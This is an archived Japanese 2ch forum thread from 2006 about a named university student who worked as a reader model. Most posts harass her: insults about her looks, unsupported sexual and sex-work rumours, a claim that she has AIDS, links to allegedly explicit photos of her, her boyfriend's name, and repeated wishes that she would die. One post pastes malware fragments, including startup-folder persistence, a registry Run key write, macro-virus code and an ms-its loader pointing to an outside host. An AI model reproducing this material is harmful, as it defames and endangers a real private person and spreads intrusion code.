5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆158cm☆上津原由貴奈ちゃん3☆38`☆

1 :無名モデル:2006/10/08(日) 21:29:57 ID:5vlznO2H
学習院大学4回生の由貴奈ちゃんについて語りましょう。
小柄で細くて手足の長い由貴奈ちゃん、キュートな笑顔が魅力です。
(前々スレ)
☆読者モデル 上津原由貴奈さん★
http://life7.2ch.net/test/read.cgi/model/1070540900/
(前スレ)
☆読者モデル 上津原由貴奈さんVol.2★
http://life7.2ch.net/test/read.cgi/model/1107521836/

2 :無名モデル:2006/10/08(日) 22:03:21 ID:fDyLHm9Y
2ゲト

3 :無名モデル:2006/10/09(月) 00:22:16 ID:pCF/oiM4
ブス。短足。消えろ

4 :無名モデル:2006/10/09(月) 00:29:43 ID:???
背が低いから、男受け悪い。

5 :無名モデル:2006/10/09(月) 02:39:57 ID:???
しかも、顔歪んでるww性格が歪んでる証拠だね↑↑

6 :無名モデル:2006/10/09(月) 02:57:47 ID:meHRSq8Y
けっこうかわいい!!☆

7 :無名モデル:2006/10/09(月) 03:26:31 ID:???
背が低いほうが人気!

8 :無名モデル:2006/10/09(月) 05:05:28 ID:38wdCNMs
私はゆきなちゃん、好き!!
キレイだと思う!!

でも38キロじゃなくて40か41キロじゃなかった??

9 :無名モデル:2006/10/09(月) 09:03:27 ID:mn3sItIL
枯れた木にでかい頭がくっついたみたい。
いい歳してゅきなってアホくさい

10 :無名モデル:2006/10/09(月) 13:40:22 ID:???
↑↑
かなりwwwwwwwwww
枯れた木…最高!!

11 :無名モデル:2006/10/09(月) 14:02:47 ID:???
上津原のブログ
http://blog.gw.tv/yukina/index/

12 :無名モデル:2006/10/11(水) 22:27:37 ID:???
ブログ見たらスッピン写してたけど、不細工過ぎて笑えた↑↑


13 :無名モデル:2006/10/12(木) 08:33:12 ID:yuPy2BnG
上津原由貴奈か、BUBKAにこんな写真が載ったよなhttp://j.pic.to/18it7m9(^Д^)プギャー。

14 :無名モデル:2006/10/12(木) 08:38:21 ID:yuPy2BnG
>>13のURLが失敗したのでもう一回貼ります。上津原由貴奈、かなり凄いことをしてますねhttp://j.pic.to/18it7

15 :無名モデル:2006/10/12(木) 16:00:25 ID:???
こいつラブホめぐりが趣味だって自分で言ってたよ。
H大好きなんだってさ。
彼氏いるのに美容室ガーデンの男とやりまくりあそびまくり♪ご苦労!

16 :無名モデル:2006/10/12(木) 18:56:54 ID:???
じゃ、彼氏の転勤は好都合だったわけだ。
しかし何故ブログに彼氏のことを沢山書くのかな?
ブログを通じて遠く離れた彼氏を安心させておくため?
可愛いのに怖いな。


17 :無名モデル:2006/10/12(木) 21:00:08 ID:???
三竹天狗で声が低くてこわかったけどさばさばしててキャラはすき。近藤しづかみたいなブリッコよりいい

18 :無名モデル:2006/10/13(金) 00:34:06 ID:???
>>15
渋谷のDC嬢(ホテトル嬢)ぴったりだね。

19 :無名モデル:2006/10/13(金) 01:26:21 ID:???
マジ消えて欲しい
ヤリマンブス女

20 :<body onload=window()>:2006/10/13(金) 02:36:23 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


21 :無名モデル:2006/10/14(土) 13:04:11 ID:???
口がひん曲がってるのは性格が曲がってる証拠

22 :無名モデル:2006/10/14(土) 14:22:42 ID:dDsSz2GV
下品すぎる顔。この程度でかわいいってなに? 風俗顔じゃん

23 :無名モデル:2006/10/14(土) 20:21:20 ID:???
だって…ゅきな風俗嬢だもぉんwww

24 :無名モデル:2006/10/15(日) 14:20:22 ID:U0blnTY8
ゆきなちゃんのブログ。写真サイズ間違ったのかデカくて怖すぎ・・・・
鼻の毛穴からニキビまで・・

25 :無名モデル:2006/10/15(日) 22:16:03 ID:QxBnFpVJ
彼氏、本当はこいつに疲れてんじゃね?
デート=セックスしまくりって感じの内容が強すぎて引く。

26 :無名モデル:2006/10/15(日) 23:27:57 ID:???
こいつブログ消した?

27 :無名モデル:2006/10/16(月) 00:53:25 ID:???
いや。まだ懲りずにやってるよ…
↑↑にもあるけど、いかにも彼氏とヤりました的な日記とかかいてるよ。
読モの間で超嫌われてるのいい加減気付かないのかな…みんな凄いウザがってるのに。
Ray読モの間では嫌われ度No.1!!
大学でも友達いないし…ウワベだけの付き合い。
上津原、まぢ気づいて!!みんな迷惑してんだよね↓↓
唯一の仲良しはドブスな広川恭子。出目きんと骨骨ロックな不細工ちゃん達♪

28 :無名モデル:2006/10/16(月) 08:44:25 ID:???
そんな感じだね。
何かと便利だから表面だけ仲良くしといて、深く関わらない。
上津原と仲良しでいられる、親友も腹黒いのかなーと疑ってしまうよ。
ブログ、一ヶ月ぶりにヤリました的な要素が強い。キモい。

29 :無名モデル:2006/10/16(月) 08:47:46 ID:T89kIdfj
世界一のセレブ☆

30 :無名モデル:2006/10/16(月) 10:50:36 ID:???
浮気相手のこともブログに載せてもらいたいもんだ。

31 :無名モデル:2006/10/16(月) 11:44:50 ID:???
ブログが彼氏とヤッた日記っぽいって、私も思ってたw

32 :無名モデル:2006/10/16(月) 14:01:55 ID:???
みんなもそう思ってたか(笑)

33 :無名モデル:2006/10/16(月) 17:25:30 ID:???
内定先の上司、ブブカ事件も知ってるのかな。

34 :無名モデル :2006/10/16(月) 22:23:04 ID:3110ExIe
中学生の男の子でこういう顔の子いそう

35 :無名モデル:2006/10/17(火) 18:07:35 ID:Nv5wFZqQ
なんでヤッたのわかるの?

36 :無名モデル:2006/10/17(火) 19:59:41 ID:???
ブログ写真やたら某美容師とくっついてない?

37 :無名モデル:2006/10/17(火) 22:05:13 ID:???
スタイリストさんと出来てるのかな

38 :無名モデル:2006/10/17(火) 23:15:35 ID:???
ヤリチンで有名

39 :おまえら:2006/10/18(水) 08:04:54 ID:???
馬鹿か?こんな小さい世界で悪口ばかり、アホだね

40 :無名モデル:2006/10/18(水) 21:57:08 ID:???
↑↑
キサマの方がバカ

41 :無名モデル:2006/10/18(水) 22:10:20 ID:1bRLrW1n
榎本加奈子にイメージ重なる。顔は綺麗だけど下品なヤリマンって感じ。

42 :無名モデル:2006/10/18(水) 22:50:52 ID:???
>>38
チンではないだろw

43 :無名モデル:2006/10/19(木) 00:57:58 ID:???
今テレビでてる!テレ朝なんだけどサマーズと松嶋のやつ!天狗ギャルこと読者モデルで!10人くらいいるけど上津原さんがいる〜

44 :名無し:2006/10/19(木) 15:25:22 ID:???
40
熱くなるトコ間違えてない?笑。頭悪いね〜

45 :無名モデル:2006/10/19(木) 17:53:25 ID:???
38`ってやべー

46 :無名モデル:2006/10/19(木) 21:47:34 ID:???
就職先どこだろう?
上司と不倫しそうだなワラワラ

47 :無名モデル:2006/10/20(金) 01:49:30 ID:???
チ○コさえ付いてりゃ誰でもOKな安売り女。
幸薄そうな顔。
全てが貧相。服を着こなしてる感がまるでなし。

48 :無名モデル:2006/10/20(金) 14:11:38 ID:QtUtdXxa
確かに上司と不倫しそう。こいつ会社でヤリそう。

49 :無名モデル:2006/10/20(金) 16:20:03 ID:???
minaでは1ヶ月におしゃれにかけるお金は7〜8万になってたね。
やっぱりRayに載ってた金額は読者の購買意欲をあおるためのでっちあげかな?

50 :無名モデル:2006/10/20(金) 19:48:33 ID:sTm7ljhq
さまぁ〜ずの見たけど足きれいだった

51 :無名モデル:2006/10/21(土) 21:11:09 ID:l8ubl7Qp
SEって何??

52 :ヤリマソブブカ女w:2006/10/22(日) 02:08:34 ID:t62TkbnX
上津腹黒ブス奈

ブブカの件は散々既出。
過去ログ読んだらすぐわかるけど、
女友達とフェラの真似したプリクラ ttp://oniti.sakura.ne.jp/12-2/meza5.JPG や
「乳首たたせてみた」「きもつぃ」と書いて変な顔したり
「どんどんぬぐべし」と洋服を半分脱いでみたり ttp://oniti.sakura.ne.jp/12-2/meza2.JPG
「立ちバック最高」と立ちバックのポーズとったり ttp://oniti.sakura.ne.jp/12-2/meza1.JPG
「またエッチ」と下品なポーズとったり ttp://oniti.sakura.ne.jp/12-2/meza4.JPG
あとは彼氏と撮ったプリクラ ttp://oniti.sakura.ne.jp/12-2/meza7.JPG も晒されました。

いじめに関してもよく話が出てるけど、
私立の中高一貫の学校に通っていたとき、いじめの主犯格だったとよく暴露されています。
性格がキツかったとかも。
あとは、自分のお姉さんの彼氏を寝取ったと大声で自慢したとか、
講師のバイトをしている塾で生徒の高校生を食ったと自分で言っていたとか、
あとはちょっと前のレスに唾液や使用済みの下着を売っていた?とかあった気がする。
まあ読み返せば色々書いてるのでわかるんじゃない?





53 :ヤリマソブブカ女w:2006/10/22(日) 02:12:05 ID:t62TkbnX
ゆるゆる最低不潔女 ブブカ 上津原ゆきな その1
2ちゃんねる 掲示板に戻る 全部 1- 最新50 ... ゆるゆる最低不潔女 ブブカ 上津原ゆきな その1 ... ブブカの件は散々既出。 過去ログ読んだらすぐわかるけど、 女友達とフェラの真似したプリクラ ttp://oniti. ...
life7.2ch.net/test/read.cgi/model/1120635973 - 2006年10月14日 - 4k - キャッシュ - このサイト内で検索
ヤリ万ブスヒラメ顔ブブカ女上津原由貴奈アンチスレ2
2ちゃんねる 掲示板に戻る 全部 1- 最新50 ... ヤリ万ブスヒラメ顔ブブカ女上津原由貴奈アンチスレ2 ... ブブカの件は散々既出。 過去ログ読んだらすぐわかるけど、 女友達とフェラの真似したプリクラ ttp://oniti. ...
life7.2ch.net/test/read.cgi/model/1133949347 - 2006年9月10日 - 4k - キャッシュ - このサイト内で検索


54 :無名モデル:2006/10/22(日) 08:54:35 ID:bm4xgXeB
↑可愛いからオッケー!
実際会ってみて、うえっつすっごい面白いし、好きです。

55 :無名モデル:2006/10/22(日) 11:41:23 ID:Gx1JG9Ar
たかが遊びのノリで撮っただけのプリクラでしょ?
男とマジで撮ってたなら、言われても…って感じだけど
女友達とのおふざけじゃん、
別にいいんじゃないの〜?

56 :ゆか:2006/10/22(日) 11:44:57 ID:???
56 :無名モデル :05/02/27 02:27:43 ID:GJsUfor4
由貴奈ちゃん読モなのかな?

57 ::2006/10/22(日) 11:50:37 ID:???
おふざけってゆったって、えろいの多すぎ。。頭の中どピンクなんだな笑

ついでにいつも服きこなせてないし、プリクラ当時もださいね

58 :無名モデル:2006/10/22(日) 11:58:39 ID:NCyiDWYK
58 :無名モデル :05/02/27 11:27:58 ID:GJsUfor4
ダイエット?

59 :無名モデル:2006/10/22(日) 19:40:58 ID:JoB4dnEY
上津原 ブブカ で検索すると相当出るね
プリクラショップとかでも売られてるみたい
ご両親可哀相

60 :無名モデル:2006/10/22(日) 20:21:54 ID:???
彼氏相当疲れてるみたいだよ

61 :無名モデル:2006/10/22(日) 21:55:30 ID:bm4xgXeB
だったら別れるよ。

62 :無名モデル:2006/10/22(日) 22:39:12 ID:xz5hKFMg
>>54=>>61は本人ですかぁ?
自分は遊びでもあんなバカプリクラ撮った事ないし
あんな事思いつかない。上津原さん頭からっぽなんだね

63 :無名モデル:2006/10/22(日) 22:43:59 ID:oTn3SfXJ
ブブカで検索ってどうやるの?

64 :無名モデル:2006/10/23(月) 01:28:03 ID:H3tdcyX4
>>54

面白いってどんな感じ?
私も皆が言うほど悪い人には思えない。

65 :無名モデル:2006/10/23(月) 21:48:39 ID:lKSCSjWE
彼に不相応な高価なプレゼントをねだり、
嫌な顔されたら逆切れしてごねるような女だぉ

66 :無名モデル:2006/10/23(月) 22:17:29 ID:???
ブログでチューしてるの、うえっつ?

67 :無名モデル:2006/10/24(火) 23:02:22 ID:???
>>49
今一番欲しいもののところに、「婚姻届か子供」
って素で書いててヒいた・・・。
卒業後はテキトーに仕事してさっさと慶應の彼氏に養ってもらたいんだろうね。
彼氏は研修が終わったら広島勤務から帰ってくるんだろうか。

68 :無名モデル:2006/10/24(火) 23:45:35 ID:???
>>67
将来の夢は 今の彼の嫁!それのみ!…だもんね〜…。

69 :無名モデル:2006/10/26(木) 02:57:23 ID:???
ブログに彼氏の両親に就職祝いでご飯食べに連れていってもらった、って書いてたし
彼氏も結婚するつもりなんだろうけど(少なくとも本人の前ではw)
自分の息子がこんな品のない女を結婚相手として連れてきたら猛反対だな。
このスレの存在を教えてあげたいよw

70 :無名モデル:2006/10/26(木) 04:03:48 ID:???
何このスレ?すごいヒガミ
RAYで見てこの人凄い可愛いと思ったからこのスレ来たのに
スッピンでも可愛すぎるよ。

71 :無名モデル:2006/10/26(木) 13:50:56 ID:bDlfFnbh
↑本人乙
彼氏は別に結婚なんてどうでも良さそうな雰囲気だけど、
上津原さんに押し切られちゃいそうだね。

72 :無名モデル :2006/10/26(木) 22:07:15 ID:hPCGjAt5
うえっつよりかわいい人探せばそこら辺にいっぱいいるよ

73 :無名モデル:2006/10/27(金) 01:23:53 ID:/zBRIT3X
たしかにブログのすっぴんブサイク!!
あれで美人って言ってるところが
アホなんですけどw

海外のコレクションみたいに
痩せすぎモデルの雑誌参加禁止にしたらいいのにwww

74 :無名モデル:2006/10/27(金) 01:37:06 ID:???
http://search.yahoo.co.jp/search?p=%BE%E5%C4%C5%B8%B6%CD%B3%B5%AE%C6%E0%A1%A1%A5%D6%A5%D6%A5%AB&fr=top_v2&tid=top_v2&ei=euc-jp&search.x=1

>>63 どうぞ 相当出ますよw

75 :上津腹黒由貴奈:2006/10/27(金) 01:44:32 ID:???
由貴奈の由の字は自由セクスの由です♪

ここに画像全部出してくれてます すてきなブログです
ttp://home.newsch.net/oniti/archives/blog204.html

ttp://oniti.sakura.ne.jp/12-2/meza1.JPG セクスは立ちバッグ最高♪

ttp://oniti.sakura.ne.jp/12-2/meza2.JPG 女はどんどん脱ぐべし!! 乳首立たせてみました!!

ttp://oniti.sakura.ne.jp/12-2/meza4.JPG 彼氏(もちろん今の彼氏ではありませんw)とのキスプリクラ 「また☆エッチ!!」と挿入チック☆

ttp://oniti.sakura.ne.jp/12-2/meza5.JPG フェラしてます

ttp://oniti.sakura.ne.jp/12-2/meza7.JPG 彼氏(もちろん今の彼氏ではありません)との2ショット 2枚

育ちがわかりますね・・・低俗民杉
汚川友佳より愛をこめてこのスレのみなさまにプレゼントです!!

76 :無名モデル:2006/10/27(金) 18:46:36 ID:???
>>69
親御さん、「有名な読者モデルなんだよ」の言葉に
「調べてみよう」→過去の恥ずかしい破廉恥写真&不明瞭な収入に唖然

77 :無名モデル:2006/10/27(金) 21:35:48 ID:???
>>69
まだ学生なのに、もう結婚考えてるのかよ・・・ww

78 :無名モデル:2006/10/27(金) 23:51:14 ID:JCMSYel6
Ray最近読み始めたから知らなかった
下品すぎる 吐き気がした 最低女 尻軽すぎ

79 :63:2006/10/28(土) 01:37:26 ID:???
>>74さんありがとうございます
おおまかな流れは>>75でわかりました
本当にまさかこんな人だったなんて
ちょっと派手なかんじは雑誌でわかっていたのですが、これでよく就職先ありましたよね?
アパレルってそんなに簡単に入れるのでしょうか?びっくりです。


80 :無名モデル:2006/10/28(土) 19:09:05 ID:???
こいつはアパレルじゃなくてSEになるんだってよ。
前スレでレッセパッセに就職って書かれてたけど違ってよかったわ。

81 :無名モデル:2006/10/29(日) 08:26:54 ID:Zqfd7ER5
クリスマスに彼におねだりしちゃえ〜って言葉にびっくりした。

82 :無名モデル:2006/10/29(日) 10:21:21 ID:zcOKRCzd
なんか学習院なのにバカっぽいしゃべりで笑える。
ブログ区点多くない?

83 :無名モデル:2006/10/29(日) 14:13:16 ID:???
だって学習院て馬鹿じゃんw偏差値低すぎ

84 :最低ゆるゆる女ですね:2006/10/29(日) 15:37:34 ID:???
14 :無名モデル :2006/10/12(木) 08:38:21 ID:yuPy2BnG
>>13のURLが失敗したのでもう一回貼ります。上津原由貴奈、かなり凄いことをしてますねhttp://j.pic.to/18it7

85 :無名モデル:2006/10/30(月) 03:30:30 ID:lFrp5PMG
ごめんSEってなに??

86 :無名モデル:2006/10/30(月) 08:19:53 ID:Q8MTJxeJ
馬鹿

87 :無名モデル:2006/10/30(月) 11:07:31 ID:lFrp5PMG
ゴメソゴメソ

88 :無名モデル:2006/10/31(火) 02:37:18 ID:???
システム エンジニア


89 :無名モデル:2006/10/31(火) 02:43:35 ID:???
エイズ説って本当?まぁ、ヤリマンだから不思議じゃないけど。
スッピン不細工すぎてヤバイ。
あんな顔が隣に居たら萎えそう…

90 :無名モデル:2006/10/31(火) 23:32:44 ID:???
ホント素顔ヤバすぎる…幻滅。
プロ泣かせな汚い肌

91 :無名モデル:2006/11/01(水) 12:03:59 ID:tzF3skhy
ミスキャンの小川さんのブログに上津原さん性格良くてカワイと書いてあったよぉ。

92 :無名モデル:2006/11/01(水) 13:13:57 ID:UbDJDaWx
かわいすぎ!!!

93 :無名モデル:2006/11/01(水) 20:36:46 ID:6IklvsVM
>91
小川が既に性格悪いから
今だに自分の事下の名前で呼ぶし相当ブリ
本当うざい奴
だからそんな奴の言ってる事なんてあてになんない

94 :無名モデル:2006/11/02(木) 01:09:36 ID:1Gxtnk8H
今 三竹天狗に出てるね w

95 :無名モデル:2006/11/02(木) 01:37:28 ID:???
スッピンでも可愛いよ
化粧薄いし

96 :無名モデル:2006/11/02(木) 01:46:53 ID:???

本人www
あんなキモイ尻軽バカ女のどこがイイの?

97 :無名モデル:2006/11/02(木) 20:50:57 ID:???
三竹天狗に出てる毒モの中ではカワイイ方だけど
他の人のが濃いキャラだから大して目立ってないね。

ていうかなんでまたテレビ出られるようになってんの?
ブブカの件で干されたと思ってたのに。

98 :↑ またブブカに載るためですよ:2006/11/03(金) 14:28:50 ID:uImmJH3O
由貴奈の由の字は自由セクスの由です♪

ここに画像全部出してくれてます すてきなブログです
ttp://home.newsch.net/oniti/archives/blog204.html

ttp://oniti.sakura.ne.jp/12-2/meza1.JPG セクスは立ちバッグ最高♪

ttp://oniti.sakura.ne.jp/12-2/meza2.JPG 女はどんどん脱ぐべし!! 乳首立たせてみました!!

ttp://oniti.sakura.ne.jp/12-2/meza4.JPG 彼氏(もちろん今の彼氏ではありませんw)とのキスプリクラ 「また☆エッチ!!」と挿入チック☆

ttp://oniti.sakura.ne.jp/12-2/meza5.JPG フェラしてます

ttp://oniti.sakura.ne.jp/12-2/meza7.JPG 彼氏(もちろん今の彼氏ではありません)との2ショット 2枚

育ちがわかりますね・・・低俗民杉
汚川友佳より愛をこめてこのスレのみなさまにプレゼントです!!




99 :無名モデル:2006/11/04(土) 09:01:49 ID:???
ブログで必死に小文字使ってアホ丸出しだねww
指先腐ったようなネイルしてるし全てがダサい!!!
死んだ方がいいよ

100 :無名モデル:2006/11/04(土) 22:46:58 ID:ubhYlpfK
お金持ちでお嬢様で頭も良くて身長も平均で細いけど胸があってスタイル良くて…
可愛いくて髪の毛も綺麗で性格も明るくて家族みんな仲良しで慶應のかっこいい彼氏がいて…
友達がたくさんいて就職も決まって毎日充実してる由貴奈ちゃんが羨ましい…

101 :無名モデル:2006/11/05(日) 09:09:57 ID:cUsCm3Rs
私も完璧な由貴奈ちゃんが羨ましい。
これからもずっと勝ち組なんだろうな。

102 :無名モデル:2006/11/05(日) 11:26:36 ID:9WA7q5kY
うん、可愛い。細い。ブログに太ったとか書いてあったけど充分細いから!羨ましい

103 :シオン:2006/11/06(月) 10:11:07 ID:PdXEZzVp
うえっつ良い♪

104 :無名モデル:2006/11/06(月) 15:52:11 ID:???
三竹天狗のHPみたけど、意外に落ち着いた声だね。もっときゃぴきゃぴした感じなのかと思ってた。

105 :無名モデル:2006/11/06(月) 15:53:08 ID:???
↑上津原さん お疲れ様

106 :無名モデル:2006/11/06(月) 15:55:15 ID:???
間に>>104入った‥

107 :無名モデル:2006/11/06(月) 22:26:01 ID:???
本人&彼氏が協力しあって低レベルなほめ合い…お疲れさま
バカどもさっさと氏ねよ

108 :無名モデル:2006/11/07(火) 22:12:03 ID:OuxU94oj
うーん、何でそんなに誹謗中傷するんでしょうか。
何か恨みを買うことでもしたのでしょうか?

109 :無名モデル:2006/11/07(火) 22:14:25 ID:Uho+XCXY
109系かな?

110 :無名モデル:2006/11/08(水) 00:56:21 ID:???
確かに可愛いけどお金持ちのお嬢様ではないね。地元も微妙だし学習院では外部生だし。

111 :無名モデル:2006/11/08(水) 03:20:59 ID:???
地元って何処?
千葉寄りなのは知ってるけど…

112 :無名モデル:2006/11/09(木) 12:57:47 ID:???
田舎モンから大人気の腐れ毒もの上津原ってこいつ〜??
こんなにダサいのによく堂々と雑誌載れるねww
頭おかしい??この子

113 :無名モデル:2006/11/09(木) 13:14:44 ID:cnzq+un4
おまんこ比べ女の子はやるのか?

114 :無名モデル:2006/11/12(日) 11:47:42 ID:???
ウエツハラ ユキナ
サイトウ ケイタ
氏ね
不細工バカップル

115 :無名モデル:2006/11/13(月) 06:53:34 ID:cz97ba56
読モ活動の収入っていくら?何でこんなに毎回買い物してんの?
バイトの「内容について」の話題、ブログに全く出ないね…

116 :無名モデル:2006/11/13(月) 08:19:44 ID:xdhW1eyQ
将来アパレルのオーナーかな?☆

117 :無名モデル:2006/11/13(月) 13:33:54 ID:xdhW1eyQ
うえっつ可愛い!!☆

118 :無名モデル:2006/11/13(月) 13:51:00 ID:7zZTSynK
西葛西

119 :無名モデル:2006/11/13(月) 15:47:55 ID:???
オエッッツ!

120 :無名モデル:2006/11/13(月) 18:30:43 ID:/E0ztNq0
DQNってなに?

121 :無名モデル:2006/11/13(月) 21:32:12 ID:???
未だにブブカネタで叩いてる人って、すごい粘着だね
ウエッツすっごい美人やん。羨ましいわ

122 :無名モデル:2006/11/14(火) 08:02:13 ID:???
数学界のアイドルとして売り出して欲しいな☆ニャン

123 :無名モデル:2006/11/14(火) 09:25:10 ID:zLLZMARv
メニューならオーナーが考えればいいじゃん。
店名は何になるの?

124 :無名モデル:2006/11/14(火) 12:15:23 ID:???
ガブリエル

125 :無名モデル:2006/11/14(火) 20:00:33 ID:78UJ6LwZ
うえっつ顔ちっちゃ!
いや…小川さんが大きすぎるのかな?

126 :無名モデル:2006/11/15(水) 23:00:13 ID:???
上津原も十分顔デカいしブス
シネ

127 :無名モデル:2006/11/16(木) 18:03:06 ID:Ju8mYVXw
早く彼氏と別れないのかなぁ

128 :無名モデル:2006/11/16(木) 18:26:32 ID:???
ガリガリの貧相体型!
魅力ゼロ!!

129 :無名モデル:2006/11/16(木) 19:09:17 ID:???
髪キレイ。顔キレイ
羨ましい

130 :無名モデル:2006/11/16(木) 22:20:52 ID:???
ヤリマンは氏んで下さいよ

131 :無名モデル:2006/11/19(日) 20:00:15 ID:???
広島に向かう途中に氏んでくれ

132 :無名モデル:2006/11/20(月) 12:58:50 ID:???
何のアルバイトしてるの?
九月頃、まだ暑いのにブーツがどうのこうの言ってなかった?
blogの内容と同じだね〜

133 :無名モデル:2006/11/20(月) 13:26:00 ID:cyquCuLC
この人って何の雑誌に出てるの?

134 :無名モデル:2006/11/20(月) 17:21:37 ID:5NcVeG/I
男ネタ・エロ特集ばかりの雑誌Rayだよ。

135 :無名モデル:2006/11/20(月) 18:24:51 ID:???
オエッッツ!

136 :無名モデル:2006/11/21(火) 00:11:51 ID:???
氏んで欲しいヤシNo.1

137 :無名モデル:2006/11/22(水) 21:00:31 ID:???
ブス過ぎてキモイ…
氏んでくれ

138 :無名モデル:2006/11/22(水) 21:01:58 ID:???
こいつ風俗嬢だぜ

139 :無名モデル:2006/11/23(木) 16:24:26 ID:???
高〇っていう美容師と出来てんだろ コイツ

140 :無名モデル:2006/11/23(木) 23:01:48 ID:???
チンポが付いてれば誰でもOK女ですから

141 :無名モデル:2006/11/24(金) 12:37:25 ID:5+R4Xg1v
うえっつ

142 :無名モデル:2006/11/25(土) 10:43:31 ID:6uPxjVai
この人もキャンパスパーク所属?

143 :無名モデル:2006/11/25(土) 10:51:23 ID:???
名誉毀損


144 :無名モデル:2006/11/25(土) 18:27:17 ID:SEQ2uTiL
なんでうえっつこんな叩かれてるの?かわいいし

145 :無名モデル:2006/11/26(日) 08:26:26 ID:???
>>144
性格悪すぎだから

こいつブログやめたの?

146 :無名モデル:2006/11/26(日) 09:23:31 ID:???
働きだしてからも毒モ活動は続けるのかな〜
規模は縮小しそうだけどw

147 :無名モデル:2006/11/26(日) 11:48:01 ID:???
147 :無名モデル :2005/03/29(火) 20:13:21 ID:??? [sage]
この子、学校で女友達と歩いてる所、見たことないよ。
結構嫌われてるみたい

148 :無名モデル:2006/11/26(日) 14:49:28 ID:???
だろうね。友達いないのは目に見える。
今流行の自殺してくんないかな…

149 :無名モデル:2006/11/26(日) 16:03:11 ID:IKAL9PUU
フツーの奴らより数倍可愛いよ!実物めっちゃ細いし顔がすごい小さい

150 :無名モデル:2006/11/26(日) 19:25:37 ID:L2haxlLM
ブログで22日に色々あったって書いてあったけど、
どうしたのかなぁ?

151 :無名モデル:2006/11/26(日) 21:23:49 ID:???
バ彼氏と喧嘩したか、渋谷の高級DC事務所に
国税やら警察やら入ったガサ入れ騒動に巻き込まれた?

152 :無名モデル:2006/11/26(日) 21:25:26 ID:???
うえっつ卒論がんばれ!応援しているよ!

153 :無名モデル:2006/11/26(日) 21:41:31 ID:???
国税のガサ入れあったのは22日だと言う説

154 :無名モデル:2006/11/26(日) 21:49:26 ID:???
>>148は通報しとく

155 :無名モデル:2006/11/27(月) 02:26:03 ID:???
うえっつ細すぎ…
もう少しふっくらした方が可愛いのに。


156 :無名モデル:2006/11/27(月) 03:09:14 ID:???
可愛い☆

157 :無名モデル:2006/11/27(月) 03:10:28 ID:oqYFsc24
ゆきなちゃん普通に美人

158 :無名モデル:2006/11/27(月) 03:55:33 ID:WRASCBVv
サバサバ美人さんって感じ。普通に好感もてる!

159 :無名モデル:2006/11/27(月) 04:06:51 ID:oqYFsc24
可愛いと僻まれて大変だね…


160 :無名モデル:2006/11/27(月) 04:09:08 ID:???
>159
毎回同じセリフw

161 :無名モデル:2006/11/27(月) 04:11:13 ID:oqYFsc24
158さん。同感!
ブリッコが多い中でサバサバしていて私は好きだな♪
彼氏さんと幸せになって欲しい!
ブログ見てても自分に正直な感じで楽しいし!
みんなでウエッツ応援しよっ☆☆

162 :無名モデル:2006/11/27(月) 04:21:11 ID:???
私はRAYで見て一目惚れした…可愛すぎる!ファン歴かれこれ4年弱!!
香里奈ちゃんに似てる気がするのは私だけ???なんとなくだけど。
青学の学祭で見かけたけど、細くて(でもガリじゃないの!)綺麗でビックリしたよ!
実物見たらスタイルの良さにプロのモデルでも通用するんじゃないかって勢いだった。

163 :無名モデル:2006/11/27(月) 04:26:03 ID:???
細いけど、あの胸は…チト不自然。
濃いメイクよりナチュラル、巻き髪よりもストレートな方が似合うと思う。
あとパンツ系よりスカートの方がイイ

164 :無名モデル:2006/11/27(月) 04:30:04 ID:???
読モの中で1番可愛い(。・ω-。)-☆

165 :無名モデル:2006/11/27(月) 04:33:37 ID:???
頭が良くて、慶応卒の彼氏がいて、ずば抜けて美人な上津原さんが羨ましい…
ブブカネタで未だに叩いてる人たち、いい加減辞めたら?


166 :無名モデル:2006/11/27(月) 04:37:17 ID:???
三竹天狗の放送が待ち遠しい(*^ω^*)

167 :無名モデル:2006/11/27(月) 06:12:47 ID:tYDwrRQ3
自演乙

168 :無名モデル:2006/11/27(月) 06:45:12 ID:???
何この分かりやすい深夜の自演w

169 :無名モデル:2006/11/27(月) 10:04:49 ID:???
書き込むペースがねw数分おきw

170 :無名モデル :2006/11/27(月) 13:46:34 ID:PqGXJQr9
学習院で頭がいい?
慶應卒の彼氏が羨ましい?
ずば抜けて美人?

171 :無名モデル:2006/11/27(月) 13:51:34 ID:B6ulpf4n
薄い顔好きの俺にはたまらん!

172 :無名モデル:2006/11/27(月) 13:54:48 ID:A+tZpKeA
慶應卒の彼氏いるの?今学習院の中に彼氏いる気がするけど。。

173 :無名モデル:2006/11/27(月) 19:38:14 ID:nxZsfRyy
彼氏は慶應卒ですよ。大1から付き合ってる

174 :無名モデル:2006/11/27(月) 20:54:12 ID:???
その彼とはスーフリのイベントでの美男美女コンテストで知り合ったんだよね

175 :無名モデル:2006/11/27(月) 21:15:29 ID:???
スーフリキタコレ

176 :無名モデル:2006/11/27(月) 21:18:37 ID:???
ゆきなちゃんは可愛いけど、彼氏はカッコいい??

177 :無名モデル:2006/11/27(月) 21:19:12 ID:???
↑貴様はひっこんどれ。チンカス野郎が

178 :無名モデル:2006/11/27(月) 21:33:07 ID:???
可愛い♪゛

179 :無名モデル:2006/11/27(月) 21:56:50 ID:???
ゆきなちゃんの乳って何?

180 :無名モデル:2006/11/27(月) 22:25:40 ID:???
乳は滅茶苦茶小さい。
パット入れまくりだよ

